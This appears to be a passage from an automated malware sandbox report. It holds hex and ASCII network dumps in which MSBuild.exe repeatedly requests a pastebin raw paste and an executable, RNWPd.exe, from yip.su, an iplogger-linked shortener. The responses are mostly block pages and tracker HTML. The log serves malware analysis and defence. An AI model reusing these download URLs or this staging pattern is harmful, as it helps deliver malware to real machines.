                    Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
                    2024-09-16 19:23:35 UTC1369INData Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29
                    Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
                    2024-09-16 19:23:35 UTC1369INData Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d
                    Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
                    2024-09-16 19:23:35 UTC1369INData Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22
                    Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
                    2024-09-16 19:23:35 UTC156INData Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:23:35 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    61192.168.2.649791104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:40 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:23:40 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433b7beda07cea-EWR
                    2024-09-16 19:23:40 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:23:40 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:23:40 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:23:40 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:23:40 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    62192.168.2.649792188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:41 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:23:41 UTC898INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:23:41 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:23:41 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2FS7bD2ujgZhtzh1lLl1l5jkg9e1eRzLMXjsOANplb1Tp1ZHd3Kq4777GSV81e7fEp5wffgzbbskMZX0s6Q3XsNJMCXZvWLL7bjyj5cdYfQ%2FAAi0IJW4vQI%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c433b7fdc8a43b6-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:23:41 UTC471INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:23:41 UTC1369INData Raw: 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d
                    Data Ascii: r" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property=
                    2024-09-16 19:23:41 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                    Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                    2024-09-16 19:23:41 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                    Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                    2024-09-16 19:23:41 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                    Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                    2024-09-16 19:23:41 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                    Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                    2024-09-16 19:23:41 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:23:41 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    63192.168.2.649793104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:23:46 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:23:46 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:23:46 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433ba00f874265-EWR
                    2024-09-16 19:23:46 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:23:46 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:23:46 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
